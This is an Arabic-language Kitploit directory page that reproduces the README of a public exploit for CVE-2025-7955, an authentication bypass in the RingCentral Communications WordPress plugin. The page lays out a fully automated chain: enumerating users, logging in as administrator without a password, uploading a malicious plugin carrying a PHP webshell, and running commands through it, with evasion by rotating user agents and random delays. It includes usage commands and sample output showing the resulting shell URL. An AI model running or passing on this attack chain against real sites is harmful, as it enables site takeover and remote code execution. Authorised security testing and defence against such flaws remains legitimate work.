Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-7955 — RingCentral Communications 1.5 - 1.6.8 - عدم وجود تحقق من جانب الخادم يؤدي إلى تجاوز المصادقة عبر دالة ringcentral_admin_login_2fa_verify | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2025-7955
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالشيل كوداستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالمصادقةالفريق الأحمر
GitHubnxploited/cve-2025-7955

CVE-2025-7955

RingCentral Communications 1.5 - 1.6.8 - عدم وجود تحقق من جانب الخادم يؤدي إلى تجاوز المصادقة عبر دالة ringcentral_admin_login_2fa_verify

1منذ 11 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

CVE-2025-7955

RingCentral Communications 1.5 - 1.6.8 - فقدان التحقق من جانب الخادم يؤدي إلى تجاوز المصادقة عبر دالة ringcentral_admin_login_2fa_verify

🚨 CVE-2025-7955 | استغلال RingCentral Communications لووردبريس


📝 نظرة عامة على الثغرة

CVE: CVE-2025-7955
الملحق المتأثر: RingCentral Communications (ووردبريس)
الإصدارات المتأثرة: 1.5 – 1.6.8
درجة CVSS: 9.8 (حرجة)
النوع: تجاوز المصادقة (فقدان التحقق من جانب الخادم)

الملحق RingCentral Communications لووردبريس معرض لتجاوز المصادقة بسبب التحقق غير السليم داخل الدالة ringcentral_admin_login_2fa_verify(). الإصدارات 1.5 إلى 1.6.8 تسمح للمهاجمين غير المصادق عليهم بتسجيل الدخول كأي مستخدم بمجرد تقديم أكواد مكررة وهمية.


⚡ وظيفة السكربت

هذا الاستغلال يؤتمت سلسلة الهجوم الكاملة لـ CVE-2025-7955. وهو مصمم لـ:

  • تجاوز المصادقة: يسجل السكربت الدخول إلى ووردبريس كأي مستخدم (عادةً مدير) دون الحاجة إلى كلمة مرور، مستغلاً نقطة النهاية الضعيفة للتحقق الثنائي.
  • اكتشاف أسماء المستخدمين تلقائياً: إذا لم يُقدم اسم المستخدم، سيحاول السكربت تعدادها عبر REST API لووردبريس (/wp-json/wp/v2/users/ID).
  • استخراج الرموز المطلوبة: يجلب تلقائياً nonce حماية CSRF اللازم لرفع الملحقات.
  • رفع ملحق خبيث (webshell): بعد المصادقة، يرفع السكربت ملف ZIP لملحق يحتوي على PHP webshell.
  • تنفيذ الأوامر عبر webshell: بعد الرفع الناجح، يوضح السكربت تنفيذ الأوامر بتشغيل whoami عبر القشرة ويطبع المخرجات.
  • ميزات التخفي والتهرب: يستخدم تأخيرات عشوائية، وقائمة دوارة لعوامل المستخدم، وكشف أساسي لجدران الحماية/الـ captcha لتجاوز الحماية البسيطة.

🚀 الاستخدام

  1. جهز ملحقك الخبيث
    تأكد من وجود ملف ZIP للملحق الخبيث (افتراضياً: Nxploit.zip) في نفس مجلد السكربت.

  2. شغل الاستغلال:

    root@kitploit:~
    python3 CVE-2025-7955.py -u http://target/wordpress [-user admin] [-id 1] [-z Nxploit.zip]
    
    • -u, --url : (مطلوب) رابط موقع ووردبريس المستهدف
    • -user, --username : (اختياري) اسم المستخدم لتسجيل الدخول به (يُكتشف تلقائياً إذا حُذف)
    • -id, --id_admin : (افتراضي: 1) معرف المستخدم (المدير عادةً ID 1)
    • -z, --zip : (افتراضي: Nxploit.zip) مسار ملف ZIP للملحق الخبيث
  3. مثال:

    root@kitploit:~
    python3 CVE-2025-7955.py -u http://target/wordpress
    

✅ الإخراج الناجح المتوقع

root@kitploit:~
888b    888                   888          d8b 888                 888 
8888b   888                   888          Y8P 888                 888 
88888b  888                   888              888                 888 
888Y88b 888 888  888 88888b.  888  .d88b.  888 888888 .d88b.   .d88888 
888 Y88b888 `Y8bd8P' 888 "88b 888 d88""88b 888 888   d8P  Y8b d88" 888 
888  Y88888   X88K   888  888 888 888  888 888 888   88888888 888  888 
888   Y8888 .d8""8b. 888 d88P 888 Y88..88P 888 Y88b. Y8b.     Y88b 888 
888    Y888 888  888 88888P"  888  "Y88P"  888  "Y888 "Y8888   "Y88888 
                     888                                               
                     888                                               
                     888                                               
CVE-2025-7955 استغلال بواسطة: Nxploited 

[*] استخدام عامل المستخدم: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
[*] محاولة تسجيل الدخول كـ: admin (المعرف: 1)
[+] تم تسجيل الدخول بنجاح!
[+] Nonce: 661e57f2e4
[*] جاري رفع الملحق الخبيث...
[+] تم رفع الملحق بنجاح!
[*] تنفيذ: whoami
----------------------------------------
daemon
----------------------------------------
[+] القشرة: http://target/wordpress/wp-content/plugins/Nxploit/index.php?cmd=COMMAND

🎯 الميزات الرئيسية

  • لا حاجة لكلمة مرور: يستغل عيباً منطقياً لتجاوز المصادقة بالكامل.
  • التعداد التلقائي: يمكنه استخراج أسماء المستخدمين ومعرفاتهم عبر API العام.
  • استغلال بدون تدخل يدوي: من تسجيل الدخول إلى رفع webshell إلى تنفيذ الأوامر، كل الخطوات مؤتمتة.
  • تجاوز الأساسيات: تأخيرات عشوائية، تزوير الرؤوس، وكشف الحماية الأساسية.
  • قابلية التعديل: يمكن تعديل حمولة الملحق أو إضافة ميزات بسهولة.

⚠️ إخلاء مسؤولية

هذه الأداة للاستخدام المصرح به في اختبار الأمان وللأغراض التعليمية فقط.
الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها غير قانوني وغير أخلاقي.
المؤلف لا يتحمل أي مسؤولية عن أي إساءة استخدام أو أضرار ناتجة عن هذا السكربت.


بواسطة: Khaled Alenazi (Nxploited)

تنزيل الأداة

أو مع تحديد اسم المستخدم/المعرف:

root@kitploit:~
python3 CVE-2025-7955.py -u http://target/wordpress -user admin -id 1